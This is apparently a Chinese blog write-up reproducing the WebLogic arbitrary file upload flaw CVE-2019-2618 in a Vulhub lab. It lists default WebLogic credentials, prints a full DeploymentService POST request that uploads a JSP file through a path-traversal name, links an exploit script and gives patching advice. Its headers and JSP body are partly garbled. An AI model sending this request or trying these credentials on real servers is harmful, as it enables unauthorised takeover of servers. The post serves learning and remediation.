weblogic 文件打开数_WebLogic任意文件上传漏洞(CVE20192618)复现
1.漏洞介绍
CVE-2019-2618漏洞主要是利用了WebLogic组件中的DeploymentService接口,该接口支持向服务器上传任意文件。攻击者突破了OAM(Oracle Access Management)认证,设置wl_request_type参数为app_upload,构造文件上传格式的POST请求包,上传jsp木马文件,进而可以获得整个服务器的权限。
2.影响版本
WebLogic 10.3.6.0、12.1.3.0、12.2.1.3
3.漏洞复现
3.1漏洞环境
使用Vulhub里面的CVE-2017-10271环境作为漏洞环境
root@kali:~/vulhub/weblogic/CVE-2017-10271# ls1.png docker-compose.yml README.md set_mirror.sh
root@kali:~/vulhub/weblogic/CVE-2017-10271# docker-compose up -d
访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动
3.2漏洞利用
需要获取weblogic的登陆权限
可尝试以下默认口令
weblogic/weblogic
weblogic/Oracle@123
POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1Host: 192.168.64.161:7001Connection: closeAccept-Encoding: gzip, deflateAccept: */*User-Agent: python-requests/2.21.0username: weblogicwl_request_type: app_uploadcache-control: no-cachewl_upload_application_name: /../tmp/_WL_internal/bea_wls_internal/9j4dqk/warserverName: testpassword: Oracle@123content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gWarchive: trueserver_version: 10.3.6.0wl_upload_delta: trueContent-Length: 1081------WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name="img"; filename="test.jsp"Content-Type: false out.print("123456");%>------WebKitFormBoundary7MA4YWxkTrZu0gW--
4.修复建议
1、加强密码口令
2、Oracle官方已经在关键补丁更新(CPU)中修复了该漏洞
链接:
https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
5.工具利用
大佬脚本
https://github.com/jas502n/cve-2019-2618
weblogic 文件打开数_WebLogic任意文件上传漏洞(CVE20192618)复现相关推荐
- weblogic 文件打开数_Weblogic任意文件读取和任意文件上传
引言 weblogic中两个CVE漏洞比较有意思,所以复现一下,该两个漏洞需要在poc中加入用户名和密码(cookie)才能实现. 环境搭建 环境搭建: 首先安装weblogic 下载地址 http: ...
- UCMS文件上传漏洞(CVE-2020-25483)复现
简介 UCMS是一套使用PHP语言编写的内容管理系统. 漏洞概述 UCMS v1.4.8版本存在安全漏洞,该漏洞源于文件写的fopen()函数存在任意命令执行漏洞,攻击者可利用该漏洞可以通过该漏洞访问 ...
- 文件上传漏洞的小总结
目录 一.原理 二. 高危触发点 三.前端处理 四. 后端处理 五. 上传分类 1. js验证 绕过方法 2. 文件扩展名检测 (1). htaccsee上传漏洞 (2). Apache1.x,2.x ...
- weblogic系列漏洞整理————8、WebLogic 两处任意文件上传漏洞动态分析(CVE-2018-2894)
0x01 前言 CNCERT前几天发公告称发现Oracle公司出品的基于JavaEE结构的中间件WebLogic产品存在一个远程上传漏洞,并得到了厂商的确认,危害程度评分高达9.8分.鉴于厂商已进行了 ...
- vc++ 6.0 创建程序快捷方式的一个例子源码_漏洞复现:phpcms v9.6.0任意文件上传漏洞(CVE201814399)...
文章说明 漏洞复现是为了学习漏洞利用所写,漏洞都是互联网上以流传已久的各种漏洞的利用及原理,用来增强自己见识,培养自己动手能力,有兴趣的朋友可自行搭建环境练习.源码下载连接在文章最后. 漏洞说明 PH ...
- UEditor 任意文件上传漏洞
1 漏洞简介 1.1 漏洞描述 Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本.其他的php,jsp,asp版本不受此UEditor的 ...
- Linux比较大文件内容,Linux系统最大文件打开数优化,解决Too many open files报错
这是一个Linux系统常见的故障,网络上也能轻易的找到解决办法,我也只是在工作中遇到了这个问题,所以在博客记录下,以备不时之需. 一.报错截图: 图为resin的报错日志,很明显提示了Too many ...
- 详细分析 Sonlogger 任意文件上传漏洞 (CVE-2021-27964)
聚焦源代码安全,网罗国内外最新资讯! 概述 Sonlogger 是土耳其SFC 公司 开发的一款应用软件,兼容土耳其<第5651号法>,是一款基于 Web 的 SonicWall 防火墙 ...
- FireEye 红队失窃工具大揭秘之:分析复现 Zoho 任意文件上传漏洞(CVE-2020-8394)
聚焦源代码安全,网罗国内外最新资讯! 前言 最近,全球领先的网络安全公司 FireEye 疑遭某 APT 组织的攻击,其大量政府客户信息遭越权访问,且红队工具被盗.虽然目前尚不清楚这些红队工具将被如 ...
最新文章
- three.ar.js_我们如何通过AR.js使产品吉祥物栩栩如生
- java中字节输入流和输出流的简单使用例子
- TreeMap源码分析,看了都说好
- 关于spring的p标签(转)
- Blum Integer的定义及举例
- iOS获取ipa素材、提取ipa资源图片文件
- php怎么求最小公倍数,C++_详解C语言求两个数的最大公约数及最小公倍数的方法,求两个正整数的最大公约数nbs - phpStudy...
- MySQL和Oracle的一些区别
- 科学研究:统计来看,是不是新(接触的)人运气明显好?
- MSDN下载出现链接格式有误,如何解决
- # AD19规则设置的傻瓜式教程
- 显示器+测试软件,MonitorTest(显示器性能测试软件
- 代码抛出异常后进行事务回滚的两种方式(Spring @Transactional注解)
- ROS做端口映射DDNS的N个做法详细教程
- python中shape错误_python中shape错误
- 启动优化之Android-Startup
- 会议录播软件测试自学,如何录制Zoom视频会议?
- Python笔记-面向对象
- 不可不知的CPU风扇清理技巧
- 球球大佬们帮忙分析win10蓝屏dmp!!